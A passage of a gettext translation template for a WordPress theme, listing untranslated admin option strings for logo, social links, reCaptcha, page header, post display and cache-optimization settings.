framework-customizations/theme/options/general-settings.php:188 msgid "Site Logo Transparent" msgstr "" #: framework-customizations/theme/options/general-settings.php:189 msgid "Upload the site logo .png or .jpg use for header transparent" msgstr "" #: framework-customizations/theme/options/general-settings.php:200 msgid "Site Logo Text" msgstr "" #: framework-customizations/theme/options/general-settings.php:201 msgid "You can use this field instead of above field \"Site Logo Image\"." msgstr "" #: framework-customizations/theme/options/general-settings.php:206 msgid "Logo Alt Attribute" msgstr "" #: framework-customizations/theme/options/general-settings.php:207 msgid "" "Appears inside the image container when the image can not be displayed. It " "helps search engines understand what an image is about." msgstr "" #: framework-customizations/theme/options/general-settings.php:211 msgid "Logo Title Attribute" msgstr "" #: framework-customizations/theme/options/general-settings.php:212 msgid "" "Used to provide a title for your image. It is displayed in a popup when a " "user takes their mouse over to an image." msgstr "" #: framework-customizations/theme/options/general-settings.php:235 msgid "Select icon type" msgstr "" #: framework-customizations/theme/options/general-settings.php:240 #: framework-customizations/theme/options/general-settings.php:400 #: framework-customizations/theme/options/general-settings.php:463 msgid "Font Awesome" msgstr "" #: framework-customizations/theme/options/general-settings.php:241 #: framework-customizations/theme/options/general-settings.php:401 #: framework-customizations/theme/options/general-settings.php:464 msgid "Custom Upload" msgstr "" #: framework-customizations/theme/options/general-settings.php:257 msgid "For best results upload a square image, larger then 30px x 30px." msgstr "" #: framework-customizations/theme/options/general-settings.php:282 msgid "Button To Top" msgstr "" #: framework-customizations/theme/options/general-settings.php:283 msgid "Enable scroll to top?" msgstr "" #: framework-customizations/theme/options/general-settings.php:296 msgid "WooCommerce Account" msgstr "" #: framework-customizations/theme/options/general-settings.php:297 msgid "Show WooCommerce account on header top right." msgstr "" #: framework-customizations/theme/options/general-settings.php:310 msgid "Language Switcher" msgstr "" #: framework-customizations/theme/options/general-settings.php:311 msgid "Show language switcher of WPML plugin on header top" msgstr "" #: framework-customizations/theme/options/general-settings.php:324 msgid "Google Map - API Key" msgstr "" #: framework-customizations/theme/options/general-settings.php:325 msgid "" "This key is used to run a some feature of Google Map. Please refer document " "to create a key" msgstr "" #: framework-customizations/theme/options/general-settings.php:334 msgid "Enable reCaptcha" msgstr "" #: framework-customizations/theme/options/general-settings.php:335 msgid "Choose to enable reCaptcha when user register." msgstr "" #: framework-customizations/theme/options/general-settings.php:350 msgid "ReCaptcha API Site Key" msgstr "" #: framework-customizations/theme/options/general-settings.php:351 #: framework-customizations/theme/options/general-settings.php:357 msgid "" "This key is used to run reCaptcha. Please refer document to create a key" msgstr "" #: framework-customizations/theme/options/general-settings.php:356 msgid "ReCaptcha API Secret Key" msgstr "" #: framework-customizations/theme/options/general-settings.php:370 msgid "Social Profiles" msgstr "" #: framework-customizations/theme/options/general-settings.php:374 msgid "Social Settings" msgstr "" #: framework-customizations/theme/options/general-settings.php:379 msgid "Social Links" msgstr "" #: framework-customizations/theme/options/general-settings.php:380 msgid "Add your social profiles" msgstr "" #: framework-customizations/theme/options/general-settings.php:385 msgid "" "Enter a name (it is for internal use and will not appear on the front end)" msgstr "" #: framework-customizations/theme/options/general-settings.php:395 msgid "Select social icon type" msgstr "" #: framework-customizations/theme/options/general-settings.php:423 msgid "Enter your social URL link" msgstr "" #: framework-customizations/theme/options/general-settings.php:433 #: framework-customizations/theme/options/general-settings.php:437 #: framework-customizations/theme/options/general-settings.php:442 msgid "Customize Icon" msgstr "" #: framework-customizations/theme/options/general-settings.php:443 msgid "Add your customizable icon" msgstr "" #: framework-customizations/theme/options/general-settings.php:448 msgid "Enter a name (it will show in front end)" msgstr "" #: framework-customizations/theme/options/general-settings.php:458 msgid "Select customize icon type" msgstr "" #: framework-customizations/theme/options/general-settings.php:486 msgid "Enter your customize icon URL link" msgstr "" #: framework-customizations/theme/options/header-settings.php:11 msgid "Header" msgstr "" #: framework-customizations/theme/options/header-settings.php:15 #: framework-customizations/theme/options/posts/page.php:179 msgid "Header Settings" msgstr "" #: framework-customizations/theme/options/header-settings.php:24 msgid "Header Layout" msgstr "" #: framework-customizations/theme/options/import-export.php:7 msgid "Import / Export" msgstr "" #: framework-customizations/theme/options/import-export.php:12 msgid "Import Options" msgstr "" #: framework-customizations/theme/options/import-export.php:13 msgid "" "WARNING! This will overwrite all existing option values, please proceed with " "caution!" msgstr "" #: framework-customizations/theme/options/import-export.php:17 msgid "Export Options" msgstr "" #: framework-customizations/theme/options/import-export.php:18 msgid "" "Here you can copy/download your current option settings. Keep this safe as " "you can use it as a backup should anything go wrong, or you can use it to " "restore your settings on this site (or any other site)." msgstr "" #: framework-customizations/theme/options/page-404-settings.php:16 #: framework-customizations/theme/options/page-404-settings.php:20 msgid "404 Settings" msgstr "" #: framework-customizations/theme/options/page-404-settings.php:26 msgid "Choose layout for page 404." msgstr "" #: framework-customizations/theme/options/page-404-settings.php:40 msgid "Page 404" msgstr "" #: framework-customizations/theme/options/page-404-settings.php:41 msgid "Choose page to display as page 404." msgstr "" #: framework-customizations/theme/options/page-404-settings.php:56 msgid "Illustration Image" msgstr "" #: framework-customizations/theme/options/page-404-settings.php:59 msgid "Upload illustration image." msgstr "" #: framework-customizations/theme/options/page-404-settings.php:80 msgid "Back To Home Text" msgstr "" #: framework-customizations/theme/options/page-404-settings.php:84 msgid "Button 02 Text" msgstr "" #: framework-customizations/theme/options/page-404-settings.php:88 msgid "Enter link for button 02" msgstr "" #: framework-customizations/theme/options/page-boxed-layout.php:6 #: framework-customizations/theme/options/page-boxed-layout.php:17 msgid "Boxed Layout" msgstr "" #: framework-customizations/theme/options/page-header-settings.php:12 msgid "Area Setting" msgstr "" #: framework-customizations/theme/options/page-header-settings.php:23 #: framework-customizations/theme/options/page-options.php:76 msgid "Choose layout for page header area." msgstr "" #: framework-customizations/theme/options/page-header-settings.php:34 #: framework-customizations/theme/options/page-options.php:87 msgid "Choose style for page header area." msgstr "" #: framework-customizations/theme/options/page-header-settings.php:45 msgid "Select the page header background color" msgstr "" #: framework-customizations/theme/options/page-header-settings.php:62 #: framework-customizations/theme/options/page-options.php:108 #: framework-customizations/theme/options/post-settings.php:212 msgid "Featured Image" msgstr "" #: framework-customizations/theme/options/page-header-settings.php:73 #: framework-customizations/theme/options/page-options.php:119 msgid "Upload an image to make background image" msgstr "" #: framework-customizations/theme/options/page-header-settings.php:95 msgid "Page Header Align" msgstr "" #: framework-customizations/theme/options/page-header-settings.php:100 #: framework-customizations/theme/options/page-options.php:126 msgid "Page Header Padding Top" msgstr "" #: framework-customizations/theme/options/page-header-settings.php:101 #: framework-customizations/theme/options/page-options.php:127 msgid "Enter padding top in pixels. Ex:80 " msgstr "" #: framework-customizations/theme/options/page-header-settings.php:106 #: framework-customizations/theme/options/page-options.php:131 msgid "Page Header Padding Bottom" msgstr "" #: framework-customizations/theme/options/page-header-settings.php:107 #: framework-customizations/theme/options/page-options.php:132 msgid "Enter padding bottom in pixels. Ex:80 " msgstr "" #: framework-customizations/theme/options/page-header-settings.php:115 #: framework-customizations/theme/options/page-header-settings.php:186 msgid "Title Setting" msgstr "" #: framework-customizations/theme/options/page-header-settings.php:126 #: framework-customizations/theme/options/page-header-settings.php:197 #: framework-customizations/theme/options/page-options.php:137 msgid "Title On Page Header" msgstr "" #: framework-customizations/theme/options/page-header-settings.php:148 #: framework-customizations/theme/options/page-header-settings.php:219 #: framework-customizations/theme/options/page-options.php:156 #: framework-customizations/theme/options/template-settings.php:259 #: framework-customizations/theme/options/template-settings.php:329 #: framework-customizations/theme/options/template-settings.php:399 #: framework-customizations/theme/options/template-settings.php:469 #: framework-customizations/theme/options/template-settings.php:533 msgid "Choose Title" msgstr "" #: framework-customizations/theme/options/page-header-settings.php:150 msgid "Page Title" msgstr "" #: framework-customizations/theme/options/page-header-settings.php:159 #: framework-customizations/theme/options/page-header-settings.php:231 #: framework-customizations/theme/options/page-options.php:165 #: framework-customizations/theme/options/taxonomies/category.php:63 #: framework-customizations/theme/options/taxonomies/slz-faq-cat.php:60 #: framework-customizations/theme/options/template-settings.php:267 #: framework-customizations/theme/options/template-settings.php:337 #: framework-customizations/theme/options/template-settings.php:407 #: framework-customizations/theme/options/template-settings.php:477 #: framework-customizations/theme/options/template-settings.php:541 msgid "Custom Title" msgstr "" #: framework-customizations/theme/options/page-header-settings.php:162 #: framework-customizations/theme/options/page-header-settings.php:234 #: framework-customizations/theme/options/page-options.php:168 #: framework-customizations/theme/options/taxonomies/category.php:66 #: framework-customizations/theme/options/taxonomies/slz-faq-cat.php:63 msgid "Enter custom title to display in page header" msgstr "" #: framework-customizations/theme/options/page-header-settings.php:258 msgid "Breadcrumb Setting" msgstr "" #: framework-customizations/theme/options/page-header-settings.php:269 #: framework-customizations/theme/options/page-options.php:176 msgid "Breadcrumb On Page Header" msgstr "" #: framework-customizations/theme/options/page-header-settings.php:284 msgid "Breadcrumb Styling" msgstr "" #: framework-customizations/theme/options/page-header-settings.php:295 msgid "Breadcrumb Active Styling" msgstr "" #: framework-customizations/theme/options/page-header-settings.php:323 #: framework-customizations/theme/options/page-header-settings.php:357 #: framework-customizations/theme/options/page-header-settings.php:404 #: framework-customizations/theme/options/page-options.php:54 msgid "Page Header Area" msgstr "" #: framework-customizations/theme/options/page-header-settings.php:346 msgid "Posts" msgstr "" #: framework-customizations/theme/options/page-header-settings.php:430 #: framework-customizations/theme/options/page-options.php:22 msgid "Page Header" msgstr "" #: framework-customizations/theme/options/page-options.php:5 #: framework-customizations/theme/options/page-options.php:14 #: framework-customizations/theme/options/template-settings.php:26 msgid " Default" msgstr "" #: framework-customizations/theme/options/page-options.php:6 msgid " Post Title" msgstr "" #: framework-customizations/theme/options/page-options.php:7 msgid " Category" msgstr "" #: framework-customizations/theme/options/page-options.php:8 #: framework-customizations/theme/options/page-options.php:16 #: framework-customizations/theme/options/template-settings.php:27 msgid " Custom" msgstr "" #: framework-customizations/theme/options/page-options.php:15 msgid " Page Title" msgstr "" #: framework-customizations/theme/options/page-options.php:158 msgid "" "Choose title to display in page header. To get setting from \"Theme Setting" "\", choose \"Default\"" msgstr "" #: framework-customizations/theme/options/post-settings.php:38 msgid "Social Share" msgstr "" #: framework-customizations/theme/options/post-settings.php:39 msgid "Enable social share links in single pages ?" msgstr "" #: framework-customizations/theme/options/post-settings.php:53 msgid "Add Social" msgstr "" #: framework-customizations/theme/options/post-settings.php:58 msgid "Facebook" msgstr "" #: framework-customizations/theme/options/post-settings.php:59 msgid "Twitter" msgstr "" #: framework-customizations/theme/options/post-settings.php:60 msgid "Google Plus" msgstr "" #: framework-customizations/theme/options/post-settings.php:61 msgid "Pinterest" msgstr "" #: framework-customizations/theme/options/post-settings.php:62 msgid "LinkedIn" msgstr "" #: framework-customizations/theme/options/post-settings.php:63 msgid "Digg" msgstr "" #: framework-customizations/theme/options/post-settings.php:75 msgid "Share Count" msgstr "" #: framework-customizations/theme/options/post-settings.php:76 msgid "Enable social share count in single pages ?" msgstr "" #: framework-customizations/theme/options/post-settings.php:91 msgid "Facebook App ID" msgstr "" #: framework-customizations/theme/options/post-settings.php:92 msgid "Enter App ID to get the share count of Facebook." msgstr "" #: framework-customizations/theme/options/post-settings.php:96 msgid "Facebook Secret Key" msgstr "" #: framework-customizations/theme/options/post-settings.php:97 msgid "Enter Secret Key to get the share count of Facebook." msgstr "" #: framework-customizations/theme/options/post-settings.php:113 #: framework-customizations/theme/options/post-settings.php:573 msgid "Post Settings" msgstr "" #: framework-customizations/theme/options/post-settings.php:117 msgid "Post Layout" msgstr "" #: framework-customizations/theme/options/post-settings.php:122 msgid "Blog Style" msgstr "" #: framework-customizations/theme/options/post-settings.php:123 msgid "Select the blog display style" msgstr "" #: framework-customizations/theme/options/post-settings.php:128 #: framework-customizations/theme/options/post-settings.php:346 #: framework-customizations/theme/options/posts/page.php:85 #: framework-customizations/theme/options/posts/post.php:44 #: framework-customizations/theme/options/posts/product.php:32 #: framework-customizations/theme/options/posts/slz-faq.php:32 #: framework-customizations/theme/options/posts/slz-portfolio.php:32 #: framework-customizations/theme/options/posts/slz-service.php:32 #: framework-customizations/theme/options/posts/slz-team.php:32 #: framework-customizations/theme/options/taxonomies/category.php:30 #: framework-customizations/theme/options/taxonomies/slz-faq-cat.php:27 #: framework-customizations/theme/options/template-settings.php:43 #: framework-customizations/theme/options/template-settings.php:72 #: framework-customizations/theme/options/template-settings.php:97 #: framework-customizations/theme/options/template-settings.php:122 #: framework-customizations/theme/options/template-settings.php:147 #: framework-customizations/theme/options/template-settings.php:172 #: framework-customizations/theme/options/template-settings.php:197 #: framework-customizations/theme/options/template-settings.php:239 #: framework-customizations/theme/options/template-settings.php:309 #: framework-customizations/theme/options/template-settings.php:379 #: framework-customizations/theme/options/template-settings.php:449 #: framework-customizations/theme/options/template-settings.php:513 msgid "Sidebar Layout" msgstr "" #: framework-customizations/theme/options/post-settings.php:129 msgid "Set how to display sidebar in single pages." msgstr "" #: framework-customizations/theme/options/post-settings.php:136 msgid "Post Sidebar" msgstr "" #: framework-customizations/theme/options/post-settings.php:137 #: framework-customizations/theme/options/post-settings.php:355 #: framework-customizations/theme/options/posts/page.php:114 #: framework-customizations/theme/options/posts/post.php:73 #: framework-customizations/theme/options/posts/product.php:61 #: framework-customizations/theme/options/posts/slz-faq.php:61 #: framework-customizations/theme/options/posts/slz-portfolio.php:61 #: framework-customizations/theme/options/posts/slz-service.php:61 #: framework-customizations/theme/options/posts/slz-team.php:61 #: framework-customizations/theme/options/taxonomies/category.php:58 #: framework-customizations/theme/options/taxonomies/slz-faq-cat.php:55 #: framework-customizations/theme/options/template-settings.php:52 #: framework-customizations/theme/options/template-settings.php:81 #: framework-customizations/theme/options/template-settings.php:106 #: framework-customizations/theme/options/template-settings.php:131 #: framework-customizations/theme/options/template-settings.php:156 #: framework-customizations/theme/options/template-settings.php:181 #: framework-customizations/theme/options/template-settings.php:206 #: framework-customizations/theme/options/template-settings.php:248 #: framework-customizations/theme/options/template-settings.php:318 #: framework-customizations/theme/options/template-settings.php:388 #: framework-customizations/theme/options/template-settings.php:458 #: framework-customizations/theme/options/template-settings.php:522 msgid "You can create new sidebar in" msgstr "" #: framework-customizations/theme/options/post-settings.php:137 #: framework-customizations/theme/options/post-settings.php:355 #: framework-customizations/theme/options/template-settings.php:52 #: framework-customizations/theme/options/template-settings.php:81 #: framework-customizations/theme/options/template-settings.php:106 #: framework-customizations/theme/options/template-settings.php:131 #: framework-customizations/theme/options/template-settings.php:156 #: framework-customizations/theme/options/template-settings.php:181 #: framework-customizations/theme/options/template-settings.php:206 #: framework-customizations/theme/options/template-settings.php:248 #: framework-customizations/theme/options/template-settings.php:318 #: framework-customizations/theme/options/template-settings.php:388 #: framework-customizations/theme/options/template-settings.php:458 #: framework-customizations/theme/options/template-settings.php:522 msgid "Appearance > Widgets" msgstr "" #: framework-customizations/theme/options/post-settings.php:143 msgid "Post Info" msgstr "" #: framework-customizations/theme/options/post-settings.php:147 msgid "Select Post Info" msgstr "" #: framework-customizations/theme/options/post-settings.php:155 msgid "Tag" msgstr "" #: framework-customizations/theme/options/post-settings.php:156 msgid "Comment Count" msgstr "" #: framework-customizations/theme/options/post-settings.php:157 msgid "View Count" msgstr "" #: framework-customizations/theme/options/post-settings.php:158 msgid "Like Count" msgstr "" #: framework-customizations/theme/options/post-settings.php:162 msgid "Select post info to show in single pages and blocks." msgstr "" #: framework-customizations/theme/options/post-settings.php:176 msgid "Show Related Articles" msgstr "" #: framework-customizations/theme/options/post-settings.php:177 msgid "Show related articles in single pages ?" msgstr "" #: framework-customizations/theme/options/post-settings.php:194 msgid "Filter related articles by ?" msgstr "" #: framework-customizations/theme/options/post-settings.php:198 #: framework-customizations/theme/options/post-settings.php:533 msgid "By Category" msgstr "" #: framework-customizations/theme/options/post-settings.php:202 msgid "By Tag" msgstr "" #: framework-customizations/theme/options/post-settings.php:207 msgid "Display Options" msgstr "" #: framework-customizations/theme/options/post-settings.php:213 msgid "Meta Info(Date, View, Comment,...)" msgstr "" #: framework-customizations/theme/options/post-settings.php:217 msgid "Select options to show in related posts." msgstr "" #: framework-customizations/theme/options/post-settings.php:222 msgid "Enter number of columns to display related articles. Ex: 3" msgstr "" #: framework-customizations/theme/options/post-settings.php:227 msgid "Article Post Limit" msgstr "" #: framework-customizations/theme/options/post-settings.php:228 msgid "Total post of related article will be show. Ex: 6" msgstr "" #: framework-customizations/theme/options/post-settings.php:233 msgid "Article Order By" msgstr "" #: framework-customizations/theme/options/post-settings.php:234 msgid "Order the post in related article by ?" msgstr "" #: framework-customizations/theme/options/post-settings.php:236 msgid "ID" msgstr "" #: framework-customizations/theme/options/post-settings.php:245 msgid "Article Order" msgstr "" #: framework-customizations/theme/options/post-settings.php:246 msgid "Order the post in related article with ascending or descending mode ?" msgstr "" #: framework-customizations/theme/options/post-settings.php:248 msgid "Desc" msgstr "" #: framework-customizations/theme/options/post-settings.php:249 msgid "Asc" msgstr "" #: framework-customizations/theme/options/post-settings.php:259 msgid "Other Settings" msgstr "" #: framework-customizations/theme/options/post-settings.php:263 msgid "Post Tags" msgstr "" #: framework-customizations/theme/options/post-settings.php:264 msgid "Show list of post tags in single pages?" msgstr "" #: framework-customizations/theme/options/post-settings.php:277 msgid "Post Categories" msgstr "" #: framework-customizations/theme/options/post-settings.php:278 msgid "Show list of post categories in single pages ?" msgstr "" #: framework-customizations/theme/options/post-settings.php:291 msgid "Author Box" msgstr "" #: framework-customizations/theme/options/post-settings.php:292 msgid "Show author box in single pages?" msgstr "" #: framework-customizations/theme/options/post-settings.php:305 msgid "Post Navigation" msgstr "" #: framework-customizations/theme/options/post-settings.php:306 msgid "Show post navigation in single pages ?" msgstr "" #: framework-customizations/theme/options/post-settings.php:320 msgid "Date Type" msgstr "" #: framework-customizations/theme/options/post-settings.php:323 msgid "Ribbon" msgstr "" #: framework-customizations/theme/options/post-settings.php:347 msgid "Set how to display sidebar in service single pages." msgstr "" #: framework-customizations/theme/options/post-settings.php:354 #: framework-customizations/theme/options/posts/page.php:113 #: framework-customizations/theme/options/posts/post.php:72 #: framework-customizations/theme/options/posts/product.php:60 #: framework-customizations/theme/options/posts/slz-faq.php:60 #: framework-customizations/theme/options/posts/slz-portfolio.php:60 #: framework-customizations/theme/options/posts/slz-service.php:60 #: framework-customizations/theme/options/posts/slz-team.php:60 #: framework-customizations/theme/options/taxonomies/category.php:57 #: framework-customizations/theme/options/taxonomies/slz-faq-cat.php:54 #: framework-customizations/theme/options/template-settings.php:51 #: framework-customizations/theme/options/template-settings.php:80 #: framework-customizations/theme/options/template-settings.php:105 #: framework-customizations/theme/options/template-settings.php:130 #: framework-customizations/theme/options/template-settings.php:155 #: framework-customizations/theme/options/template-settings.php:180 #: framework-customizations/theme/options/template-settings.php:205 #: framework-customizations/theme/options/template-settings.php:247 #: framework-customizations/theme/options/template-settings.php:317 #: framework-customizations/theme/options/template-settings.php:387 #: framework-customizations/theme/options/template-settings.php:457 #: framework-customizations/theme/options/template-settings.php:521 msgid "Choose Sidebar" msgstr "" #: framework-customizations/theme/options/post-settings.php:364 msgid "Select default event label background color." msgstr "" #: framework-customizations/theme/options/post-settings.php:370 msgid "Label Text Color" msgstr "" #: framework-customizations/theme/options/post-settings.php:371 msgid "Select default event label text color." msgstr "" #: framework-customizations/theme/options/post-settings.php:388 #: framework-customizations/theme/options/posts/slz-faq.php:91 #: framework-customizations/theme/options/template-settings.php:561 msgid "Footer Top Other Content" msgstr "" #: framework-customizations/theme/options/post-settings.php:389 #: framework-customizations/theme/options/posts/slz-faq.php:92 #: framework-customizations/theme/options/template-settings.php:562 msgid "Choose to display footer top other content." msgstr "" #: framework-customizations/theme/options/post-settings.php:401 #: framework-customizations/theme/options/posts/slz-faq.php:104 #: framework-customizations/theme/options/template-settings.php:574 msgid "Custom Content" msgstr "" #: framework-customizations/theme/options/post-settings.php:402 #: framework-customizations/theme/options/posts/slz-faq.php:105 #: framework-customizations/theme/options/template-settings.php:575 msgid "Enter footer top other content." msgstr "" #: framework-customizations/theme/options/post-settings.php:425 msgid "Related Products" msgstr "" #: framework-customizations/theme/options/post-settings.php:434 msgid "Show Related Products" msgstr "" #: framework-customizations/theme/options/post-settings.php:435 msgid "Show related products in product pages ?" msgstr "" #: framework-customizations/theme/options/post-settings.php:453 msgid "Total posts of related posts will be show." msgstr "" #: framework-customizations/theme/options/post-settings.php:459 #: framework-customizations/theme/options/post-settings.php:550 msgid "Enter number of columns to show." msgstr "" #: framework-customizations/theme/options/post-settings.php:476 msgid "Portfolio Info" msgstr "" #: framework-customizations/theme/options/post-settings.php:480 msgid "Review Rating" msgstr "" #: framework-customizations/theme/options/post-settings.php:481 msgid "Show review rating in portfolio blocks?" msgstr "" #: framework-customizations/theme/options/post-settings.php:497 msgid "Related Posts" msgstr "" #: framework-customizations/theme/options/post-settings.php:506 msgid "Show Related Posts" msgstr "" #: framework-customizations/theme/options/post-settings.php:507 msgid "Show related posts in portfolio single pages ?" msgstr "" #: framework-customizations/theme/options/post-settings.php:523 msgid "Related Box Title" msgstr "" #: framework-customizations/theme/options/post-settings.php:524 msgid "Enter title for related box in portfolio single pages." msgstr "" #: framework-customizations/theme/options/post-settings.php:529 msgid "Filter related posts by ?" msgstr "" #: framework-customizations/theme/options/post-settings.php:537 msgid "By Author" msgstr "" #: framework-customizations/theme/options/post-settings.php:544 msgid "Total posts of related post will be show." msgstr "" #: framework-customizations/theme/options/posts/page.php:16 #: framework-customizations/theme/options/posts/post.php:4 #: framework-customizations/theme/options/posts/product.php:5 #: framework-customizations/theme/options/posts/slz-faq.php:5 #: framework-customizations/theme/options/posts/slz-portfolio.php:5 #: framework-customizations/theme/options/posts/slz-service.php:5 #: framework-customizations/theme/options/posts/slz-team.php:5 #: framework-customizations/theme/options/taxonomies/category.php:20 #: framework-customizations/theme/options/taxonomies/slz-faq-cat.php:18 msgid "-- Default --" msgstr "" #: framework-customizations/theme/options/posts/page.php:86 msgid "Set how to display page sidebar." msgstr "" #: framework-customizations/theme/options/posts/page.php:114 #: framework-customizations/theme/options/posts/post.php:73 #: framework-customizations/theme/options/posts/product.php:61 #: framework-customizations/theme/options/posts/slz-faq.php:61 #: framework-customizations/theme/options/posts/slz-portfolio.php:61 #: framework-customizations/theme/options/posts/slz-service.php:61 #: framework-customizations/theme/options/posts/slz-team.php:61 #: framework-customizations/theme/options/taxonomies/category.php:58 #: framework-customizations/theme/options/taxonomies/slz-faq-cat.php:55 msgid "Widgets" msgstr "" #: framework-customizations/theme/options/posts/page.php:120 msgid "Select background color for this page" msgstr "" #: framework-customizations/theme/options/posts/page.php:128 msgid "Upload background image for this page." msgstr "" #: framework-customizations/theme/options/posts/page.php:139 #: framework-customizations/theme/options/typography.php:28 msgid "Custom Colors" msgstr "" #: framework-customizations/theme/options/posts/page.php:156 #: framework-customizations/theme/options/posts/slz-faq.php:67 #: framework-customizations/theme/options/posts/slz-portfolio.php:67 #: framework-customizations/theme/options/posts/slz-service.php:67 #: framework-customizations/theme/options/posts/slz-team.php:67 msgid "Content Padding Top" msgstr "" #: framework-customizations/theme/options/posts/page.php:157 #: framework-customizations/theme/options/posts/slz-faq.php:68 #: framework-customizations/theme/options/posts/slz-portfolio.php:68 #: framework-customizations/theme/options/posts/slz-service.php:68 #: framework-customizations/theme/options/posts/slz-team.php:68 msgid "Custom padding top for content (px)." msgstr "" #: framework-customizations/theme/options/posts/page.php:162 #: framework-customizations/theme/options/posts/slz-faq.php:73 #: framework-customizations/theme/options/posts/slz-portfolio.php:73 #: framework-customizations/theme/options/posts/slz-service.php:73 #: framework-customizations/theme/options/posts/slz-team.php:73 msgid "Content Padding Bottom" msgstr "" #: framework-customizations/theme/options/posts/page.php:163 #: framework-customizations/theme/options/posts/slz-faq.php:74 #: framework-customizations/theme/options/posts/slz-portfolio.php:74 #: framework-customizations/theme/options/posts/slz-service.php:74 #: framework-customizations/theme/options/posts/slz-team.php:74 msgid "Custom padding bottom for content (px)." msgstr "" #: framework-customizations/theme/options/posts/page.php:169 msgid "You can add revolution slider in header." msgstr "" #: framework-customizations/theme/options/posts/page.php:230 msgid " Page Options" msgstr "" #: framework-customizations/theme/options/posts/post.php:30 msgid " Post Options" msgstr "" #: framework-customizations/theme/options/posts/post.php:37 msgid "Post Template" msgstr "" #: framework-customizations/theme/options/posts/post.php:45 #: framework-customizations/theme/options/taxonomies/category.php:31 #: framework-customizations/theme/options/taxonomies/slz-faq-cat.php:28 #: framework-customizations/theme/options/template-settings.php:44 #: framework-customizations/theme/options/template-settings.php:73 #: framework-customizations/theme/options/template-settings.php:98 #: framework-customizations/theme/options/template-settings.php:123 #: framework-customizations/theme/options/template-settings.php:148 #: framework-customizations/theme/options/template-settings.php:173 #: framework-customizations/theme/options/template-settings.php:198 msgid "Set how to display blog sidebar." msgstr "" #: framework-customizations/theme/options/posts/post.php:81 msgid "Feature Video" msgstr "" #: framework-customizations/theme/options/posts/post.php:90 msgid "Video Thumbnail" msgstr "" #: framework-customizations/theme/options/posts/post.php:91 msgid "Create thumbnail from video and using it as featured image?." msgstr "" #: framework-customizations/theme/options/posts/post.php:101 msgid "Type of Video" msgstr "" #: framework-customizations/theme/options/posts/post.php:136 msgid "Feature Audio" msgstr "" #: framework-customizations/theme/options/posts/post.php:145 msgid "Audio Link" msgstr "" #: framework-customizations/theme/options/posts/post.php:146 msgid "Input full link of audio." msgstr "" #: framework-customizations/theme/options/posts/post.php:153 msgid "Feature Gallery" msgstr "" #: framework-customizations/theme/options/posts/post.php:163 msgid "Choose Images to upload" msgstr "" #: framework-customizations/theme/options/posts/post.php:171 msgid "Feature Quote" msgstr "" #: framework-customizations/theme/options/posts/post.php:180 msgid "Quote Text" msgstr "" #: framework-customizations/theme/options/posts/post.php:181 msgid "Input quote content. Accept some htmls as div, p, cite, ..." msgstr "" #: framework-customizations/theme/options/posts/product.php:25 #: framework-customizations/theme/options/posts/slz-faq.php:25 #: framework-customizations/theme/options/posts/slz-portfolio.php:25 #: framework-customizations/theme/options/posts/slz-service.php:25 #: framework-customizations/theme/options/posts/slz-team.php:25 msgid "Page Options" msgstr "" #: framework-customizations/theme/options/posts/product.php:33 #: framework-customizations/theme/options/posts/slz-portfolio.php:33 msgid "Set how to display portfolio sidebar." msgstr "" #: framework-customizations/theme/options/posts/slz-faq.php:33 #: framework-customizations/theme/options/posts/slz-service.php:33 #: framework-customizations/theme/options/posts/slz-team.php:33 msgid "Set how to display team sidebar." msgstr "" #: framework-customizations/theme/options/speed-optimize.php:31 msgid "Rejected Page Types" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:32 msgid "" "Do not cache the following page types. See the Conditional Tags " "documentation for a complete discussion on each type." msgstr "" #: framework-customizations/theme/options/speed-optimize.php:34 msgid "Single Posts (is_single)" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:35 msgid "Pages (is_page)" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:36 msgid "Front Page (is_front_page)" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:37 msgid "Home (is_home)" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:38 msgid "Archives (is_archive)" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:39 msgid "Tags (is_tag)" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:40 msgid "Category (is_category)" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:41 msgid "Feeds (is_feed)" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:42 msgid "Search Pages (is_search)" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:43 msgid "Author Pages (is_author)" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:47 msgid "Rejected Post ID" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:50 msgid "" "Enter here the post IDs separated by commas (ex: 10,23,50) to disable cache " "in this page." msgstr "" #: framework-customizations/theme/options/speed-optimize.php:55 msgid "Rejected User Roles" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:56 msgid "Select user roles that should not receive cached pages." msgstr "" #: framework-customizations/theme/options/speed-optimize.php:58 msgid "Administrator" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:59 msgid "Editor" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:61 msgid "Contributor" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:62 msgid "Subscriber)" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:66 msgid "Rejected User Agents" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:69 msgid "Never send cache pages for these user agents." msgstr "" #: framework-customizations/theme/options/speed-optimize.php:76 msgid "Rejected User Cookies" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:79 msgid "Never cache pages that use the specified cookies." msgstr "" #: framework-customizations/theme/options/speed-optimize.php:86 msgid "Accepted Query Strings" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:89 msgid "Always cache URLs with these query strings." msgstr "" #: framework-customizations/theme/options/speed-optimize.php:106 msgid "Rejected WooCommerce Pages" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:107 msgid "Do not cache the above pages." msgstr "" #: framework-customizations/theme/options/speed-optimize.php:113 msgid "My Account" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:114 msgid "Cart" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:116 msgid "Shop" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:125 msgid "Optimize Performance" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:129 msgid "Minify Resource" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:133 #: framework-customizations/theme/options/speed-optimize.php:216 #: framework-customizations/theme/options/speed-optimize.php:281 msgid "General Configuration" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:139 msgid "JavaScript Minification" msgstr "" #: framework-customizations/theme/options/speed-optimize.php:140 msgid "Enable / Disable javaScript minification" msgstr "" #: 